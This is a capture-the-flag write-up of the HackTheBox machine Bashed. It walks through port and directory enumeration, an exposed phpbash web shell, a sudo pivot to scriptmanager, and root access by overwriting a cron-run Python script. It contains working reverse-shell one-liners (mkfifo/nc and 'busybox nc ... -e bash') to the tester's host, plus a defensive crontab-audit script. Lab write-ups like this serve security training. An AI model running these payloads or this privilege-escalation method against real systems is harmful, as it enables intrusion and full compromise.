
HackTheBox Bashed Writeup

Bashed

Information Gathering

Nmap Enumeration

Quick Scan

┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.68    
[sudo] password for wzwr: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 02:20 CDT
Initiating Parallel DNS resolution of 1 host. at 02:20
Completed Parallel DNS resolution of 1 host. at 02:20, 0.01s elapsed
Initiating Connect Scan at 02:20
Scanning 10.10.10.68 [1000 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed Connect Scan at 02:20, 11.68s elapsed (1000 total ports)
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.17s latency).
Scanned at 2025-04-17 02:20:44 CDT for 12s
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.71 seconds

Full Scan

┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 02:21 CDT
Initiating Parallel DNS resolution of 1 host. at 02:21
Completed Parallel DNS resolution of 1 host. at 02:21, 0.00s elapsed
Initiating Connect Scan at 02:21
Scanning 10.10.10.68 [65535 ports]
Discovered open port 80/tcp on 10.10.10.68
Increasing send delay for 10.10.10.68 from 0 to 5 due to max_successful_tryno increase to 5
Connect Scan Timing: About 6.00% done; ETC: 02:30 (0:08:06 remaining)
Connect Scan Timing: About 13.89% done; ETC: 02:29 (0:06:18 remaining)
Connect Scan Timing: About 22.07% done; ETC: 02:28 (0:05:21 remaining)
Connect Scan Timing: About 30.33% done; ETC: 02:28 (0:04:38 remaining)
Connect Scan Timing: About 38.33% done; ETC: 02:28 (0:04:03 remaining)
Connect Scan Timing: About 46.64% done; ETC: 02:28 (0:03:27 remaining)
Connect Scan Timing: About 54.47% done; ETC: 02:28 (0:02:56 remaining)
Connect Scan Timing: About 62.20% done; ETC: 02:28 (0:02:26 remaining)
Connect Scan Timing: About 70.18% done; ETC: 02:28 (0:01:55 remaining)
Increasing send delay for 10.10.10.68 from 5 to 10 due to max_successful_tryno increase to 6
Connect Scan Timing: About 77.35% done; ETC: 02:28 (0:01:34 remaining)
Connect Scan Timing: About 83.43% done; ETC: 02:29 (0:01:12 remaining)
Connect Scan Timing: About 89.21% done; ETC: 02:29 (0:00:49 remaining)
Completed Connect Scan at 02:29, 476.46s elapsed (65535 total ports)
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.14s latency).
Scanned at 2025-04-17 02:21:52 CDT for 477s
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 476.49 seconds

HTTP Enumeration

Gobuster Enumeration

┌──(wzwr㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess            (Status: 403) [Size: 295]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/server-status        (Status: 403) [Size: 299]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

Web Server Information

┌──(wzwr㉿kali)-[~]
└─$ curl 10.10.10.68 -v
*   Trying 10.10.10.68:80...
* Connected to 10.10.10.68 (10.10.10.68) port 80
> GET / HTTP/1.1
> Host: 10.10.10.68
> User-Agent: curl/8.8.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Thu, 17 Apr 2025 07:03:54 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Mon, 04 Dec 2017 23:03:42 GMT
< ETag: "1e3f-55f8bbac32f80"
< Accept-Ranges: bytes
< Content-Length: 7743
< Vary: Accept-Encoding
< Content-Type: text/html
< 

Website Interesting Information

Source code

<!DOCTYPE HTML>
<html lang="en-US">
    <head>
        <title>Arrexel's Development Site</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="description" content="Template by Colorlib" />
        <meta name="keywords" content="HTML, CSS, JavaScript, PHP" />
        <meta name="author" content="Colorlib" />
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

        <link rel="shortcut icon" href="images/favicon.png" />
        <link href='http://fonts.googleapis.com/css?family=Montserrat:400,700%7CLibre+Baskerville:400,400italic,700' rel='stylesheet' type='text/css'>
        <link rel="stylesheet" type="text/css"  href='css/clear.css' />
        <link rel="stylesheet" type="text/css"  href='css/common.css' />
        <link rel="stylesheet" type="text/css"  href='css/font-awesome.min.css' />
        <link rel="stylesheet" type="text/css"  href='css/carouFredSel.css' />
        <link rel="stylesheet" type="text/css"  href='css/sm-clean.css' />
        <link rel="stylesheet" type="text/css"  href='style.css' />

        <!--[if lt IE 9]>
                <script src="js/html5.js"></script>
        <![endif]-->

    </head>


    <body class="home blog">

        <!-- Preloader Gif -->
        <table class="doc-loader">
            <tbody>
                <tr>
                    <td>
                        <img src="images/ajax-document-loader.gif" alt="Loading...">
                    </td>
                </tr>
            </tbody>
        </table>

        <!-- Left Sidebar -->
        <div id="sidebar" class="sidebar">
            <div class="menu-left-part">
                <div class="search-holder">
                    <label>
                        <input type="search" class="search-field" placeholder="Type here to search..." value="" name="s" title="Search for:">
                    </label>
                </div>
                <div class="site-info-holder">
                    <h1 class="site-title">Arrexel's Development Site</h1>
                    <p class="site-description">
                        News and information about my latest development work.
                    </p>
                </div>
                <nav id="header-main-menu">
                    <ul class="main-menu sm sm-clean">
                        <li><a href="index.html" class="current">Home</a></li>
                    </ul>
                </nav>
                <footer>
                    <div class="footer-info">
                        © 2018 SUPPABLOG HTML TEMPLATE. <br> CRAFTED WITH <i class="fa fa-heart"></i> BY <a href="https://colorlib.com">COLORLIB</a>.
                    </div>
                </footer>
            </div>
            <div class="menu-right-part">
                <div class="logo-holder">
                    <a href="index.html">
                        <img src="images/logo.png" alt="Suppablog WP">
                    </a>
                </div>
                <div class="toggle-holder">
                    <div id="toggle">
                        <div class="menu-line"></div>
                    </div>
                </div>
                <div class="social-holder">
                    <div class="social-list">
                        <a href="#"><i class="fa fa-twitter"></i></a>
                        <a href="#"><i class="fa fa-youtube-play"></i></a>
                        <a href="#"><i class="fa fa-facebook"></i></a>
                        <a href="#"><i class="fa fa-vimeo"></i></a>
                        <a href="#"><i class="fa fa-behance"></i></a>
                        <a href="#"><i class="fa fa-rss"></i></a>
                    </div>
                </div>
                <div class="fixed scroll-top"><i class="fa fa-caret-square-o-up" aria-hidden="true"></i></div>
            </div>
            <div class="clear"></div>
        </div>

        <!-- Home Content -->
        <div id="content" class="site-content">
            <div id="blog-wrapper">
                <div class="blog-holder center-relative">


                    <article id="post-1" class="blog-item-holder featured-post">
                        <div class="entry-content relative">
                            <div class="content-1170 center-relative">
                                <div class="cat-links">
                                    <ul>
                                        <li>
                                            <a href="#">Development</a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="entry-date published">December 4, 2017</div>
                                <h2 class="entry-title">
                                    <a href="single.html">phpbash</a>
                                </h2>
                                <div class="excerpt">
                                     <a href="https://github.com/Arrexel/phpbash" target="_blank">phpbash</a> helps a lot with pentesting. I have tested it on multiple different servers and it was very useful. I actually developed it on this exact server!<a class="read-more" href="single.html"></a>
                                </div>
                                <div class="clear"></div>
                            </div>
                        </div>
                    </article>


                    <article id="post-2" class="blog-item-holder">
                        <div class="entry-content relative">
                            <div class="content-1170 center-relative">
                                <h2 class="entry-title">
                                    <a href="single.html">phpbash</a>
                                </h2>
                                <div class="cat-links">
                                    <ul>
                                        <li>
                                            <a href="#">Development</a>
                                        </li>
                                    </ul>
                                </div>
                                <div class="entry-date published">December 4, 2017</div>
                                <div class="clear"></div>
                            </div>
                        </div>
                    </article> 
                </div>
                <div class="clear"></div>
                <div class="block load-more-holder">LOAD MORE ENTRIES</div>
            </div>

            <div class="featured-image-holder">
                <div class="featured-post-image" style="background-image: url(demo-images/bg.jpg)"></div>

            </div>
            <div class="clear"></div>
        </div>

        <!--Load JavaScript-->
        <script type="text/javascript" src="js/jquery.js"></script>
        <script type='text/javascript' src='js/imagesloaded.pkgd.js'></script>
        <script type='text/javascript' src='js/jquery.nicescroll.min.js'></script>
        <script type='text/javascript' src='js/jquery.smartmenus.min.js'></script>
        <script type='text/javascript' src='js/jquery.carouFredSel-6.0.0-packed.js'></script>
        <script type='text/javascript' src='js/jquery.mousewheel.min.js'></script>
        <script type='text/javascript' src='js/jquery.touchSwipe.min.js'></script>
        <script type='text/javascript' src='js/jquery.easing.1.3.js'></script>
        <script type='text/javascript' src='js/main.js'></script>
    </body>
</html>

By searching for Colorlib on Google, I found that it is a WordPress theme, so we can suspect the website is built with WordPress.

PHPBash

Note that gobuster found the endpoint /dev. Enumerating it, I found this:

Visiting phpbash.php gives us a free bash shell…?

Looking for user.txt, we find it under /home/arrexel and read it successfully!

www-data@bashed:/var/www/html/dev# ls /home
arrexel
scriptmanager
www-data@bashed:/var/www/html/dev# ls /home/arrexel
user.txt
www-data@bashed:/var/www/html/dev# cat /home/arrexel/user.txt
ff3dddc2a315573efb46e61970d7fae5

Privilege Escalation

Sudo Permission Check

We find that we can run sudo without a password:

www-data@bashed:/home# sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

However, if we run sudo directly, we hit the following problem:

www-data@bashed:/home# sudo ls
sudo: no tty present and no askpass program specified

We might think we need to escape the jail and get a reverse shell in order to obtain a TTY. However, after some research, I realised we only need to add the -u flag to run the command as scriptmanager with its permissions. The sudoers rule grants NOPASSWD only when the target user is scriptmanager, so a plain sudo ls (which targets root) still requires a password, and without a TTY sudo has no way to prompt for it…

sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

Then, using the busybox reverse shell (see the Busybox section below), we get a shell as scriptmanager:

whoami
scriptmanager

Writable Files Enumeration

After obtaining the scriptmanager shell, we need to do information gathering again. Searching for files we can write to, I found this interesting one:

find / -writable -type f 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
/sys/fs/cgroup/memory/cgroup.event_control
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
...
/var/www/html/uploads/index.html

Looking at the directory:

ls -la /scripts
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Apr 17 00:52 test.txt

and checking the content of test.py:

f = open("test.txt", "w")
f.write("testing 123!")
f.close

It seems that some process (maybe a cron job I missed?) executes our test.py as root. We can rewrite test.py to obtain the root flag:

echo "import os; os.system('cp /root/root.txt /tmp/root.txt && chmod 777 /tmp/root.txt')" > /scripts/test.py

After waiting several minutes, we get a readable copy of the root flag in /tmp/root.txt!

ls -la /tmp
total 44
drwxrwxrwt 10 root root 4096 Apr 17 00:57 .
drwxr-xr-x 23 root root 4096 Jun  2  2022 ..
drwxrwxrwt  2 root root 4096 Apr 16 23:55 .ICE-unix
drwxrwxrwt  2 root root 4096 Apr 16 23:55 .Test-unix
drwxrwxrwt  2 root root 4096 Apr 16 23:55 .X11-unix
drwxrwxrwt  2 root root 4096 Apr 16 23:55 .XIM-unix
drwxrwxrwt  2 root root 4096 Apr 16 23:55 .font-unix
drwxrwxrwt  2 root root 4096 Apr 16 23:55 VMwareDnD
-rwxrwxrwx  1 root root   33 Apr 17 00:57 root.txt
drwx------  3 root root 4096 Apr 16 23:55 systemd-private-8de6b7255d9f4785a3e858845c29678b-systemd-timesyncd.service-sqkRWG
drwx------  2 root root 4096 Apr 16 23:56 vmware-root
cat /tmp/root.txt
aa525d5248662972881e3faa0d509e93

Bonus (Reverse Shell)

echo "import os; os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.9 28787 >/tmp/f');" > /scripts/test.py

┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ nc -lvnp 28787        
listening on [any] 28787 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.68] 56756
bash: cannot set terminal process group (1566): Inappropriate ioctl for device
bash: no job control in this shell
root@bashed:/scripts# ls
ls
test.py
test.txt
root@bashed:/scripts# whoami
whoami
root
root@bashed:/scripts# cat /root/root.txt
cat /root/root.txt
aa525d5248662972881e3faa0d509e93

Bonus (check what is executing test.py)

root@bashed:/scripts# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
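
The cron entry above is the root cause: root runs every .py file in a directory owned by scriptmanager, which is why the rewritten test.py from the privilege escalation section was executed as root. As an added defensive check (my own example, not code from the writeup or the box), the POSIX shell script below flags crontab commands that reference a path writable by anyone other than the user the job runs as; it assumes GNU stat -c and runs against a constructed copy of the /scripts layout.

```shell
#!/bin/sh
# Constructed audit example (not from the writeup or the box): flag crontab
# commands that reference a path writable by someone other than the user the
# job runs as, the condition behind Bashed's /scripts job. Needs GNU stat -c.
set -eu
set -f   # disable globbing: cron lines are full of '*'

# Return 0 when PATH is owned by a uid other than RUNAS_UID or is group- or
# other-writable; return 1 when it is missing or safe.
writable_by_other() {
    p=$1; runas=$2
    [ -e "$p" ] || return 1
    owner=$(stat -c '%u' "$p")
    mode=$(stat -c '%a' "$p")
    [ "$owner" -ne "$runas" ] && return 0
    [ $(( 0$mode & 022 )) -ne 0 ]   # 022 = group-write | other-write bits
}

# Print "PATH<TAB>CRON LINE" for each absolute path in a cron command that
# writable_by_other flags. Comments, blank and NAME=value lines are skipped;
# a trailing ';' and surrounding double quotes are stripped from tokens.
audit_crontab() {
    file=$1; runas=$2
    while IFS= read -r line; do
        case $line in ''|'#'*|[A-Za-z_]*=*) continue ;; esac
        for tok in $line; do
            tok=${tok%%;*}; tok=${tok%\"}; tok=${tok#\"}
            case $tok in
                /*) if writable_by_other "$tok" "$runas"; then
                        printf '%s\t%s\n' "$tok" "$line"
                    fi ;;
            esac
        done
    done < "$file"
}

# Build a throwaway tree mirroring the box: group-writable scripts/ holding a
# 644 test.py, a locked-down bin/backup.sh, and a root-style crontab that
# references both. Prints the tree's root directory.
make_fixture() {
    root=$(mktemp -d)
    mkdir "$root/scripts" "$root/bin"
    printf 'f = open("test.txt", "w")\n' > "$root/scripts/test.py"
    printf '#!/bin/sh\n' > "$root/bin/backup.sh"
    chmod 775 "$root/scripts"; chmod 755 "$root/bin" "$root/bin/backup.sh"
    chmod 644 "$root/scripts/test.py"
    {
        printf '# constructed root crontab\nSHELL=/bin/sh\n'
        printf '* * * * * cd %s; for f in *.py; do python "$f"; done\n' "$root/scripts"
        printf '0 3 * * * %s/backup.sh\n' "$root/bin"
    } > "$root/crontab"
    printf '%s\n' "$root"
}

# Demo run as the current user; on a real host run as root against
# /var/spool/cron/crontabs/root, /etc/crontab and /etc/cron.d/*.
fixture=$(make_fixture)
audit_crontab "$fixture/crontab" "$(id -u)"
rm -rf "$fixture"
```

Only the scripts/ directory is reported: backup.sh is owned by the job's user and not group- or other-writable, so a root job calling it is fine.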

Busybox

By testing a few payloads from a reverse shell generator, I found that the busybox one works:

busybox nc 10.10.16.9 58787 -e bash

┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ nc -lnvp 58787
listening on [any] 58787 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.68] 58174

ls
arrexel
scriptmanager
ls
arrexel
scriptmanager
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Crontab Enumeration

www-data@bashed:/# ls -lah /etc/cron*
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab

/etc/cron.d:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Dec 4 2017 popularity-contest

/etc/cron.daily:
total 48K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 1.5K Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1.6K Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1.3K Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 17 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3.4K Feb 26 2016 popularity-contest

/etc/cron.hourly:
total 12K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.monthly:
total 12K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.weekly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db

This post is licensed under CC BY 4.0 by the author.